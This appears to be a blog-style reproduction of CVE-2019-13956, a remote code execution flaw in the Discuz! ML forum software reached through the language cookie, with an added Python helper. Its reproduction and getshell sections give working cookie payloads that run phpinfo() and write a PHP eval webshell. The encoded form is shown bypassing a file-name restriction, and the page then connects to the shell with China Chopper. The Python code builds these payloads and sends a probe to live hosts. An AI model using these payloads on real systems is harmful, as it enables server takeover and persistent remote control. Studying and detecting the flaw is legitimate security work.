Discuz! ML remote code execution (CVE-2019-13956)

I. Vulnerability description

The vulnerability exists in Discuz! ML (the multi-language edition). The language setting is read from a cookie that the client controls and is not strictly filtered before use, which can lead to remote code execution.

II. Affected versions

Discuz! ML V3.2

Discuz! ML V3.3

Discuz! ML V3.4

III. Building the vulnerable environment

1. Download the official Discuz! ML V3.4 from http://discuz.ml/download

2. Unpack the archive into the phpstudy web root, then browse to the upload directory to start the installation.

3. Keep clicking Next until the installation completes.

IV. Reproducing the vulnerability

1. The vulnerable code is in /upload/source/module/portal/portal_index.php: the return value of the template() function, called on 'diy:portal/index', is passed straight to include_once.

2. Following template(), the compiled-template cache file name is built by concatenating DISCUZ_LANG into it, and that cache file name is what the function returns.

3. Following DISCUZ_LANG, the language value is read from the cookie into $lng.

4. Reading on, the value of $lng is used to define DISCUZ_LANG.

5. This completes the analysis. The chain is as follows:

The external parameter $lng (the language cookie) is attacker-controlled. It is used to define DISCUZ_LANG, which template() splices into the compiled-template cache file name and returns. Because the cache file name is attacker-controlled, PHP code can be inserted into it, and when include_once loads the compiled template the injected code runs: the malicious content of the cache file name is executed as PHP. This is why the payloads below open with '. and close with .' : the cache file name is embedded in the compiled template as a single-quoted PHP string literal, and breaking out of that literal is what turns a file name into executed code.

6. To test it, open any page, intercept the request, change the value of the xxx_language cookie to '.phpinfo().' (xxx being the per-installation cookie prefix), and the code executes.

7. Looking at the cache files shows that the cache file name has been modified as follows:

8. Getting a shell (getshell)

8.1 Try to write a shell with the following payload:

'.file_put_contents('shell.php','<?php eval($_POST[cmd]);?>').'

Executing this produced an error, possibly an encoding problem. A likely explanation, given that the test host is a Windows phpstudy installation: the cookie value becomes part of a file name, and the <, ? and > in <?php ... ?> are not legal in Windows file names, so the cache file cannot be created with them in it.

8.2 URL-encoding the whole payload also failed; only the following payload succeeded:

%27.+file_put_contents%28%27shell.php%27%2Curldecode%28%27%253c%253fphp+%2520eval%28%2524_%2550%254f%2553%2554%255b%2522cmd%2522%255d%29%253b%253f%253e%27%29%29.%27

8.3 Check whether shell.php was written: it was.

8.4 Connect to it with China Chopper.
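As an added example (editor's code, not from the original write-up, the detection tool linked below, or Discuz! itself), the following Python reconstructs the payloads used in steps 6 and 8: it builds the language-cookie value, shows what the server sees after its single URL-decode, shows why the doubly-encoded form of step 8.2 avoids the characters that make the literal <?php payload of step 8.1 fail, and checks a response for the phpinfo() marker. The cookie prefix xxx, the target URL and the sample HTTP response are placeholders or constructed inputs; the file-name-character explanation is the editor's reading of a Windows phpstudy host, not something stated on the page.

```python
"""Added example for CVE-2019-13956 (editor's code, not from the write-up or Discuz!).

Builds the Discuz! ML language-cookie payloads, shows why the run-time
urldecode() wrapper is needed, and checks a response for phpinfo() output.

Assumptions (not taken from the page): the cookie prefix "xxx" and the
target URL are placeholders; the "forbidden Windows file-name characters"
reading of the step 8.1 failure is the editor's; the sample response used in
the tests is constructed.
"""
import re
import urllib.parse
import urllib.request

# PHP source the payload writes to disk (the one-liner from step 8.1).
WEBSHELL_SOURCE = '<?php eval($_POST["cmd"]);?>'

# Characters Windows does not allow in a file name. The cookie value ends up
# inside the compiled-template cache file name, so after the web server has
# URL-decoded the cookie once, none of these may remain in it (assumption:
# this is why the literal "<?php" payload of step 8.1 errored on phpstudy).
WINDOWS_FILENAME_FORBIDDEN = set('<>:"/\\|?*')

# Marker the phpinfo() probe of step 6 leaves in the response body.
PHPINFO_MARKER = "<title>phpinfo()</title>"


def build_language_cookie(php_fragment: str) -> str:
    """URL-encode a cookie value that breaks out of the single-quoted PHP
    string literal the cache file name is embedded in:  '.<fragment>.'  """
    injected = f"'.{php_fragment}.'"
    # safe="" so that ' ( ) , and similar are all percent-encoded.
    return urllib.parse.quote(injected, safe="")


def phpinfo_payload() -> str:
    """Fragment used for the step 6 detection probe."""
    return "phpinfo()"


def naive_shell_payload(filename: str = "shell.php") -> str:
    """Step 8.1: the webshell source appears literally in the cookie."""
    return f"file_put_contents('{filename}','{WEBSHELL_SOURCE}')"


def encoded_shell_payload(filename: str = "shell.php") -> str:
    """Step 8.2: the webshell source is percent-encoded a second time and
    decoded at run time by PHP's urldecode(), so the cookie value (and thus
    the cache file name) never contains < ? or >."""
    inner = urllib.parse.quote(WEBSHELL_SOURCE, safe="")
    return f"file_put_contents('{filename}',urldecode('{inner}'))"


def server_side_view(cookie_value: str) -> str:
    """What PHP sees in $_COOKIE after the single URL-decode the server
    applies, i.e. the text spliced into the cache file name."""
    return urllib.parse.unquote(cookie_value)


def forbidden_chars(cookie_value: str) -> set:
    """Forbidden Windows file-name characters left in the decoded cookie."""
    return set(server_side_view(cookie_value)) & WINDOWS_FILENAME_FORBIDDEN


def recover_written_source(cookie_value: str) -> str:
    """Reproduce what PHP's urldecode() yields at run time for an
    encoded_shell_payload cookie: the webshell source that reaches disk."""
    decoded = server_side_view(cookie_value)
    match = re.search(r"urldecode\('([^']*)'\)", decoded)
    if match is None:
        raise ValueError("cookie does not carry an urldecode() wrapper")
    return urllib.parse.unquote(match.group(1))


def looks_vulnerable(response_body: str, marker: str = PHPINFO_MARKER) -> bool:
    """Step 6 check: did the injected phpinfo() run?"""
    return marker in response_body


def probe(url: str, cookie_prefix: str = "xxx", timeout: float = 10.0) -> bool:
    """Send the phpinfo() probe to a live host (needs network access). The
    cookie name is <prefix>_language; the prefix is the per-installation
    Discuz! cookie prefix, a placeholder here."""
    cookie = f"{cookie_prefix}_language={build_language_cookie(phpinfo_payload())}"
    request = urllib.request.Request(url, headers={"Cookie": cookie})
    with urllib.request.urlopen(request, timeout=timeout) as response:
        body = response.read().decode("utf-8", errors="replace")
    return looks_vulnerable(body)


if __name__ == "__main__":
    cookie = build_language_cookie(encoded_shell_payload())
    print("Cookie value :", cookie)
    print("Server sees  :", server_side_view(cookie))
    print("PHP writes   :", recover_written_source(cookie))
    print("Naive payload leaves forbidden chars:",
          forbidden_chars(build_language_cookie(naive_shell_payload())))
```

Running the block prints the encoded cookie value, which has the same shape as the working payload in step 8.2 (Python encodes spaces as %20 where the page's payload uses +, and uses upper-case hex; both decode identically), while the naive payload of step 8.1 decodes to a string still containing <, ? and >. Only run probe() against hosts you are authorised to test.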

----------------------------------------------------------------------------------------

Detection tool: https://github.com/theLSA/discuz-ml-rce

Reference: https://mp.weixin.qq.com/s?__biz=MzU2NDc2NDYwMA==&mid=2247483944&idx=1&sn=ba9f6f99967e31fd56634f714d8ae650&scene=21#wechat_redirect

Source: www.cnblogs.com/yuzly/p/11386755.html